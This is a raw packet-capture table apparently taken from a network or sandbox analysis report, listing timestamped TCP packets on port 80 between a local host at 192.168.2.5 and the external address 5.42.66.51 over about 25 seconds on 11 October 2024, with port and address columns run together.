                                                                                                Oct 11, 2024 20:39:16.001415014 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.019853115 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.044987917 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.091801882 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.748946905 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.749037027 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.749315023 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.754410982 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.754513979 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.754615068 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.754741907 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.754822016 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.755950928 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.756014109 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.760318041 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.783624887 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.788548946 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.788633108 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.788711071 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.793785095 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.107522011 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:17.112694979 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.112848043 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.138820887 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:17.143731117 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.144040108 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.144145012 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.494836092 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.591806889 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:17.628961086 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.779299021 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:17.910679102 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.910752058 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:18.142518044 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:18.142765045 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:18.147799015 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:18.147864103 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:18.148035049 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:18.148102045 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:18.148230076 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:18.153105974 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:18.507647038 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:18.512716055 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:18.512748957 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:18.512775898 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:18.909547091 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:19.045042992 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:19.405081987 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:19.405371904 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:19.405446053 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:19.409501076 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:19.409557104 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.137480021 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.137825012 CEST5007480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.142714024 CEST80500735.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.142797947 CEST5007380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.143143892 CEST80500745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.143209934 CEST5007480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.143306971 CEST5007480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.148677111 CEST80500745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.457267046 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.498450994 CEST5007480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.503988028 CEST80500745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.504030943 CEST80500745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.504059076 CEST80500745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.545058966 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.591181040 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.748178005 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:20.825778961 CEST80500745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.959110975 CEST80500745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:20.959363937 CEST5007480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.473020077 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.473057032 CEST5007480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.473831892 CEST5007580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.478476048 CEST80500745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:21.478558064 CEST5007480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.478832006 CEST80500755.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:21.478848934 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:21.478903055 CEST5007580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.478943110 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.480437994 CEST5007580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.485323906 CEST80500755.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:21.826463938 CEST5007580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:21.832936049 CEST80500755.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:21.832951069 CEST80500755.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:22.174992085 CEST80500755.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:22.248121023 CEST5007580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:22.252944946 CEST5007680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:22.261888027 CEST80500765.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:22.262022018 CEST5007680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:22.262145042 CEST5007680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:22.269819021 CEST80500765.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:22.316065073 CEST80500755.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:22.451309919 CEST5007580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:22.610049963 CEST5007680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:22.615221024 CEST80500765.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:22.615351915 CEST80500765.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:22.615364075 CEST80500765.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:23.043248892 CEST5007580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:23.043550968 CEST5007780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:23.197813034 CEST80500775.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:23.197853088 CEST80500755.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:23.197901964 CEST5007780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:23.197909117 CEST5007580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:23.199546099 CEST5007780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:23.204540014 CEST80500775.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:23.545025110 CEST5007780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:23.550451040 CEST80500775.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:23.550590038 CEST80500775.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:23.878871918 CEST80500775.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:23.982551098 CEST5007780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:24.004137039 CEST80500775.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:24.091917038 CEST5007780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:24.670622110 CEST5007780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:24.670732021 CEST5007880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:24.675666094 CEST80500785.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:24.675771952 CEST5007880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:24.675868988 CEST5007880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:24.676193953 CEST80500775.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:24.676274061 CEST5007780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:24.681049109 CEST80500785.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:25.029625893 CEST5007880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:25.034594059 CEST80500785.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:25.035171986 CEST80500785.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:25.359827042 CEST80500785.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:25.437658072 CEST5007880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:25.491622925 CEST80500785.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:25.544946909 CEST5007880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:25.955549002 CEST80500765.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.083190918 CEST80500765.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.083266020 CEST5007680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.141151905 CEST5007680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.141216040 CEST5007880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.141412973 CEST5007980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.146518946 CEST80500795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.146574020 CEST80500765.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.146611929 CEST5007980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.146636009 CEST5007680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.146728992 CEST5007980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.147176981 CEST80500785.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.147245884 CEST5007880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.151592970 CEST80500795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.504565954 CEST5007980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.591728926 CEST80500795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.591780901 CEST80500795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.868608952 CEST5008080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.873852968 CEST80500805.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:26.874028921 CEST5008080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.874121904 CEST5008080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:26.879241943 CEST80500805.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:27.232511997 CEST5008080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:27.237462997 CEST80500805.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:27.237477064 CEST80500805.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:27.237502098 CEST80500805.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:27.586719036 CEST80500805.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:27.721393108 CEST80500805.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:27.721445084 CEST5008080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:28.557991982 CEST5008080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:28.558238983 CEST5008180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:28.563510895 CEST80500815.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:28.563591957 CEST5008180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:28.563692093 CEST5008180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:28.563761950 CEST80500805.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:28.563808918 CEST5008080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:28.568705082 CEST80500815.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:28.920068979 CEST5008180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:28.925133944 CEST80500815.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:28.925149918 CEST80500815.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:28.925159931 CEST80500815.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.250142097 CEST80500815.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.380014896 CEST80500815.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.380145073 CEST5008180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:29.520452976 CEST5008180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:29.520903111 CEST5008280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:29.525779963 CEST80500815.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.525913000 CEST5008180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:29.526169062 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.526243925 CEST5008280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:29.526647091 CEST5008280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:29.531553984 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.857270956 CEST80500795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.873183012 CEST5008280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:29.878221035 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.878309965 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.878345013 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.997654915 CEST80500795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:29.997826099 CEST5007980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.414608002 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.415333033 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.415366888 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.415462017 CEST5008280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.415791988 CEST5008280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.543251038 CEST5007980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.543951988 CEST5008280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.544173956 CEST5008380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.548824072 CEST80500795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.548928022 CEST5007980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.549143076 CEST80500835.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.549216032 CEST5008380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.549365044 CEST5008380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.549508095 CEST80500825.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.549567938 CEST5008280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.554374933 CEST80500835.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.627880096 CEST5008480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.632821083 CEST80500845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.632921934 CEST5008480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.636822939 CEST5008480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.641762018 CEST80500845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.904395103 CEST5008380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.909734964 CEST80500835.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.909781933 CEST80500835.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.909811020 CEST80500835.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.982609034 CEST5008480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:30.987941027 CEST80500845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:30.987988949 CEST80500845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:31.242057085 CEST80500835.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:31.332906961 CEST80500845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:31.376076937 CEST80500835.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:31.376219034 CEST5008380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:31.435698032 CEST5008480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:31.467992067 CEST80500845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:31.544910908 CEST5008480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.076800108 CEST5008380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.076833963 CEST5008480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.077073097 CEST5008580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.082114935 CEST80500855.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.082201004 CEST5008580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.082282066 CEST5008580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.082323074 CEST80500835.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.082933903 CEST80500845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.082998037 CEST5008380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.083005905 CEST5008480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.087172031 CEST80500855.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.435601950 CEST5008580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.440951109 CEST80500855.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.441262960 CEST80500855.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.558351040 CEST5008680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.564590931 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.564666986 CEST5008680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.564825058 CEST5008680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.570384026 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.791779995 CEST80500855.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.920021057 CEST5008680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.921631098 CEST80500855.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.921709061 CEST5008580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:32.925134897 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.926234007 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:32.926263094 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.275245905 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.403182983 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.403424978 CEST5008680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.514296055 CEST5008580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.514343977 CEST5008680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.515074015 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.519762993 CEST80500855.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.519845009 CEST5008580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.520168066 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.520241976 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.520337105 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.520381927 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.520431995 CEST5008680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.525669098 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.873148918 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.878330946 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.878710032 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.263164997 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.344012976 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.349698067 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.349775076 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.349879980 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.354758024 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.384917021 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.385014057 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.701384068 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.706842899 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.706907988 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.706952095 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.951735973 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.951973915 CEST5008980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.957077980 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.957148075 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.957777023 CEST80500895.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.957886934 CEST5008980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.957971096 CEST5008980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.962899923 CEST80500895.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.100614071 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.242341995 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.242505074 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.310625076 CEST5008980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.322803974 CEST80500895.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.322823048 CEST80500895.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.771018028 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.771222115 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.776443005 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.776586056 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.776637077 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.776695013 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.785021067 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.789894104 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.138816118 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:36.143831968 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.143858910 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.143876076 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.579437971 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.594669104 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.594721079 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.400033951 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.400151968 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.405483007 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.405567884 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.405843973 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.405988932 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.406117916 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.411068916 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.763725996 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.923161983 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.923269033 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.923427105 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:38.098081112 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:38.273564100 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:38.273700953 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.050756931 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.050976992 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.259716034 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.259741068 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.259963989 CEST5009180192.168.2.55.42.66.51
